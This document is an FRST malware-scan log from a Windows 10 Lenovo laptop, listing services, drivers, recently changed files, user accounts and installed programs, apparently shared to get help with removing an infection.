R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-08-08] (Intel Corporation)
R2 LsvUIService; C:\Program Files (x86)\Lenovo\Lenovo Smart Voice\LsvUIService.exe [70416 2013-10-26] (Lenovo)
S3 MessagingService; C:\Windows\System32\MessagingService.dll [52224 2016-07-16] (Microsoft Corporation)
S3 MessagingService_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 MessagingService_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 Motorola Device Manager; C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe [137528 2014-04-08] (Motorola Mobility LLC)
R2 NitroDriverReadSpool8; C:\Program Files\Common Files\Nitro\Pro\8.0\NitroPDFDriverService8x64.exe [230408 2013-06-28] (Nitro PDF Software)
R2 OneSyncSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R2 OneSyncSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PGService; C:\Program Files (x86)\Lenovo\Motion Control\PGService.exe [162600 2013-08-29] (PointGrab LTD)
R2 PhoneCompanionPusher; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionPusher.exe [249872 2013-10-26] (Lenovo)
S3 PhoneCompanionVap; C:\Program Files\Lenovo Yoga PhoneCompanion\PhoneCompanionVap.exe [328720 2013-10-26] (Lenovo)
R3 PimIndexMaintenanceSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 PimIndexMaintenanceSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 PST Service; C:\Program Files (x86)\Motorola\MotForwardDaemon\ForwardDaemon.exe [65657 2011-09-02] (Motorola) [File not signed]
R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390632 2012-04-24] ()
S3 RmSvc; C:\Windows\System32\RMapi.dll [140800 2016-09-15] (Microsoft Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [288472 2013-09-13] (Realtek Semiconductor)
S4 shpamsvc; C:\Windows\system32\Windows.SharedPC.AccountManager.dll [161792 2016-07-16] (Microsoft Corporation)
R2 SoftshieldService; C:\Program Files (x86)\Examsoft\Softest 11.0\Examsoft.ShieldRunner.exe [67848 2016-11-02] (Hewlett-Packard)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [249032 2015-06-03] (Synaptics Incorporated)
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
S3 TieringEngineService; C:\Windows\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation)
R3 TimeBrokerSvc; C:\Windows\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation)
S4 tzautoupdate; C:\Windows\system32\tzautoupdate.dll [95232 2016-09-24] (Microsoft Corporation)
R3 UnistoreSvc_552b6; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UnistoreSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
S3 vmicrdv; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S3 vmicvss; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S4 VPNUnlimitedService; C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe [61808 2015-09-23] (KeepSolid Inc.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S3 wisvc; C:\Windows\system32\flightsettings.dll [635904 2016-11-02] (Microsoft Corporation)
S3 WpnUserService; C:\Windows\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_552b6; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_552b6; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ymc; C:\ProgramData\LenovoTransition\Server\x64\ymc.exe [32016 2013-10-26] (Lenovo)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AcpiDev; C:\Windows\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation)
S3 applockerfltr; C:\Windows\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation)
S0 b06bdrv; C:\Windows\System32\drivers\bxvbda.sys [533856 2016-07-16] (QLogic Corporation)
S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider)
S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [154680 2016-01-07] (BlueStack Systems)
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [168448 2016-09-15] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\System32\drivers\BthHfAud.sys [37376 2016-07-16] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [249856 2016-09-15] (Microsoft Corporation)
S3 cht4iscsi; C:\Windows\System32\drivers\cht4sx64.sys [346976 2016-07-16] (Chelsio Communications)
S3 cht4vbd; C:\Windows\System32\drivers\cht4vx64.sys [2104160 2016-07-16] (Chelsio Communications)
R2 clreg; C:\Windows\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [114680 2013-08-02] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [287160 2013-08-02] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494272 2013-08-02] (Intel Corporation)
S3 hvservice; C:\Windows\System32\drivers\hvservice.sys [73568 2016-09-24] (Microsoft Corporation)
S3 iagpio; C:\Windows\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation)
S3 iai2c; C:\Windows\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation)
S3 iaLPSS2i_GPIO2; C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation)
S3 iaLPSS2i_I2C; C:\Windows\System32\drivers\iaLPSS2i_I2C.sys [176384 2016-07-16] (Intel Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [231168 2017-01-13] (Intel Corporation)
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [21408 2013-08-01] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [21920 2013-08-01] ()
S3 IndirectKmd; C:\Windows\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation)
R0 iorate; C:\Windows\System32\drivers\iorate.sys [48992 2016-11-02] (Microsoft Corporation)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [46568 2013-08-01] ()
S0 megasas2i; C:\Windows\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-12-20] (Intel Corporation)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 NETwNb64; C:\Windows\System32\drivers\Netwbw02.sys [3485696 2016-07-16] (Intel Corporation)
S0 percsas2i; C:\Windows\System32\drivers\percsas2i.sys [58720 2016-07-16] (Avago Technologies)
R3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [8247640 2013-07-19] (Realtek Semiconductor Corp.)
S0 scmbus; C:\Windows\System32\drivers\scmbus.sys [88416 2016-07-16] (Microsoft Corporation)
S3 scmdisk0101; C:\Windows\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-03] (Synaptics Incorporated)
S3 UcmTcpciCx0101; C:\Windows\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation)
S3 vmgid; C:\Windows\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation)
R0 volume; C:\Windows\System32\drivers\volume.sys [16224 2016-07-16] (Microsoft Corporation)
R2 wcifs; C:\Windows\system32\drivers\wcifs.sys [119648 2016-09-15] (Microsoft Corporation)
R2 wcnfs; C:\Windows\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 wsvd; C:\Windows\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: shpamsvc -> C:\Windows\system32\Windows.SharedPC.AccountManager.dll (Microsoft Corporation)
NETSVC: WpnService -> C:\Windows\system32\WpnService.dll (Microsoft Corporation)
NETSVC: wisvc -> C:\Windows\system32\flightsettings.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 16:49 - 2017-03-03 16:49 - 00000000 ____D C:\WINDOWS\Panther
2017-03-02 21:29 - 2017-03-02 21:29 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-03-01 14:20 - 2017-03-01 14:20 - 00000336 _____ C:\Users\007\Desktop\SHIVANG.txt
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeyFinder
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\Program Files (x86)\Magical Jelly Bean
2017-03-01 14:16 - 2017-03-01 14:16 - 00321324 _____ C:\WINDOWS\Minidump\030117-8218-01.dmp
2017-02-27 19:16 - 2017-03-03 16:44 - 00000000 ____D C:\ProgramData\ea2cb491
2017-02-27 19:16 - 2017-02-27 19:16 - 00003968 _____ C:\WINDOWS\System32\Tasks\{8A254196-3D8E-F63D-E565-AD7C49709C85}
2017-02-27 14:59 - 2017-03-03 16:49 - 00008630 _____ C:\WINDOWS\PFRO.log
2017-02-26 08:58 - 2017-02-26 08:58 - 00086646 _____ C:\Users\007\Downloads\Formula1.2016.Round21.Abu_Dhabi.Race.Build-Up.SkySportsF1.720p.H265.English.torrent
2017-02-26 07:23 - 2017-02-26 07:23 - 08176017 _____ C:\Users\007\Downloads\InfectionControl2015.zip
2017-02-26 07:23 - 2017-02-26 07:23 - 02352528 _____ C:\Users\007\Downloads\Rotator-and-Student-Orientation.zip
2017-02-24 06:11 - 2017-02-24 06:11 - 01072128 _____ C:\Users\007\Downloads\checklist-2-armed-rct_default.ppt
2017-02-21 20:15 - 2017-02-26 07:26 - 00000000 ____D C:\Users\007\Desktop\HAV lecture
2017-02-19 21:58 - 2017-02-19 22:12 - 00000000 ____D C:\Users\007\Desktop\AIMCC
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-02 20:08 - 2017-03-02 21:29 - 00003452 _____ C:\WINDOWS\setupact.log
2017-02-02 20:08 - 2017-03-02 21:29 - 00000464 _____ C:\WINDOWS\setuperr.log

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 16:52 - 2017-01-22 19:44 - 00035447 _____ C:\Users\007\Desktop\FRST.txt
2017-03-03 16:52 - 2017-01-22 19:44 - 00000000 ____D C:\FRST
2017-03-03 16:50 - 2017-01-27 19:11 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2017-03-03 16:50 - 2016-09-23 22:06 - 00000000 ____D C:\Users\007
2017-03-03 16:50 - 2016-09-23 22:03 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-03-03 16:50 - 2016-02-06 00:11 - 00000000 ____D C:\Temp
2017-03-03 16:50 - 2016-01-03 18:52 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-03-03 16:49 - 2016-09-23 22:16 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-03 16:49 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\sru
2017-03-03 16:49 - 2016-07-16 00:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-03 16:34 - 2016-08-07 10:18 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-03 16:32 - 2016-09-23 22:02 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-03 12:27 - 2016-11-28 15:49 - 00004148 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{88938F53-F35B-46C3-83EF-574C9ECB74F2}
2017-03-03 12:25 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-03 06:48 - 2015-11-08 02:11 - 00000000 ____D C:\Users\007\AppData\Roaming\vlc
2017-03-01 18:24 - 2016-07-29 22:30 - 04598902 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-01 14:36 - 2015-11-07 23:14 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-01 14:16 - 2016-10-07 07:11 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-27 19:16 - 2017-01-23 19:21 - 00000000 ____D C:\ProgramData\{75B3123D-C218-A596-FE55-6B3AE26A02BB}
2017-02-27 19:16 - 2017-01-23 19:16 - 00000000 ____D C:\ProgramData\{33B94F1E-8412-F8B5-202E-AD1CD3E2D668}
2017-02-27 19:16 - 2016-09-23 22:16 - 00003878 _____ C:\WINDOWS\System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A}
2017-02-27 14:58 - 2016-02-01 10:34 - 00000000 ____D C:\Users\007\AppData\Roaming\Rsupport
2017-02-27 14:56 - 2017-01-29 10:15 - 00000000 ____D C:\Program Files (x86)\NirSoft
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-26 09:08 - 2015-11-07 19:56 - 00000000 ____D C:\Users\007\AppData\Local\Packages
2017-02-23 18:20 - 2015-12-14 00:21 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-23 00:27 - 2015-11-08 00:08 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-23 00:23 - 2015-11-08 00:08 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-22 23:59 - 2016-12-12 13:37 - 00003270 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-02-22 23:59 - 2016-07-29 22:50 - 00002372 _____ C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-22 23:59 - 2016-07-29 22:50 - 00000000 ___RD C:\Users\007\OneDrive
2017-02-21 18:48 - 2016-07-16 05:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-19 15:09 - 2016-01-02 19:22 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-06 13:48 - 2016-07-16 05:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-02-06 13:48 - 2016-07-16 05:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-02-02 19:58 - 2017-01-22 19:55 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-02 19:58 - 2017-01-22 19:55 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2017-02-21 22:59

==================== End of FRST.txt ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 16:52:54)
Running from C:\Users\007\Desktop
Windows 10 Home (X64) (2016-09-24 04:17:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

007 (S-1-5-21-3283718265-1983809055-1317204610-1001 - Administrator - Enabled) => C:\Users\007
Administrator (S-1-5-21-3283718265-1983809055-1317204610-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3283718265-1983809055-1317204610-503 - Limited - Disabled)
Guest (S-1-5-21-3283718265-1983809055-1317204610-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.3.0.1 - Absolute Software)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated)
AirDroid 3.2.2.0 (HKLM-x32\...\AirDroid) (Version: 3.2.2.0 - Sand Studio)
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
BlackChipPoker (HKLM-x32\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
CuteFTP 8 Professional (HKLM-x32\...\{91F34319-08DE-457a-99C0-0BCDFAC145B9}) (Version: 8.3.4 - GlobalSCAPE)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.)
CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden
Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc)
Dragon Assistant Application en-US version 1.5.8 (HKLM-x32\...\{1CCBE73F-4948-4711-8D12-22E2FD65D706}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Core Recognition Service version 1.1.10 (HKLM-x32\...\{E97BA7A6-46FC-4EBF-B24A-B8362948C696}_is1) (Version: 1.1.10 - Nuance Communications, Inc.)
Dragon Assistant Installer version 1.5.8 (HKLM-x32\...\{D57A8269-3BE5-4D10-B882-64D0F2D448BF}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Language Data en-US version 1.1.3 (HKLM-x32\...\{4C0C1E4E-D3B1-4496-98EC-DA14D45EC855}_is1) (Version: 1.1.3 - Nuance Communications, Inc.)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version: - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version: - DVD Shrink)
Easy2Convert PIC to JPG 2.2.1 (HKLM-x32\...\{958D3CE0-3C49-40F1-B2EF-14D8FAED7303}_is1) (Version: 2.2.1 - Easy2Convert Software)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.1.38 - Lenovo)
Energy Manager (x32 Version: 1.0.1.38 - Lenovo) Hidden
FileZilla Client 3.14.1 (HKLM-x32\...\FileZilla Client) (Version: 3.14.1 - Tim Kosse)
Foxit PhantomPDF Business (HKLM-x32\...\{05594894-9B62-4D66-BC12-4DA14CA22F28}) (Version: 7.3.6.321 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.8.1124 - Foxit Software Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel Experience Center - Configuration (x32 Version: 1.7.0.179 - Intel) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2103 - Intel Corporation)
Intel(R) Experience Center Desktop Software (HKLM-x32\...\{3608ec0a-56b4-4d9d-b038-9b3e51d72582}) (Version: 1.7.0.179 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1337.1) (HKLM\...\{302600C1-6BDF-4FD1-1307-148929CC1385}) (Version: 3.1.1307.0362 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{D6FBF816-ACB8-46CC-ACC6-C8BBA85F497D}) (Version: 4.2.40.2418 - Intel Corporation)
Intel(R) Update Manager (x32 Version: 1.6.2.69 - Intel Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{e1172fd4-a6d9-4cfa-8256-268f728fec31}) (Version: 16.5.3 - Intel Corporation)
iTunes (HKLM\...\{554C62C7-E6BB-40F1-892B-F0AE02D3C135}) (Version: 12.5.3.17 - Apple Inc.)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java SE Development Kit 8 Update 101 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180101}) (Version: 8.0.1010.13 - Oracle Corporation)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass)
Lenovo App Shop (HKLM-x32\...\Lenovo App Shop 45246) (Version: 3.10.0.45246.24 - Lenovo)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.)
Lenovo Motion Control (HKLM-x32\...\InstallShield_{A800D2BF-2F0D-4899-B265-C91C90981E8C}) (Version: 2.0.0.0829 - PointGrab)
Lenovo Motion Control (x32 Version: 2.0.0.0829 - PointGrab) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.0 - Lenovo)
Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.0.13.8211 - Lenovo)
Lenovo Yoga PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.1.9.3 - Lenovo)
Lenovo Yoga PhoneCompanion (x32 Version: 1.1.9.3 - Lenovo) Hidden
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - )
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.12 - Magical Jelly Bean)
Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4903.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Motorola Device Manager (HKLM-x32\...\{28DB8373-C1BB-444F-A427-A55585A12ED7}) (Version: 2.5.4 - Motorola Mobility)
Motorola Device Software Update (x32 Version: 13.09.3001 - Motorola Mobility) Hidden
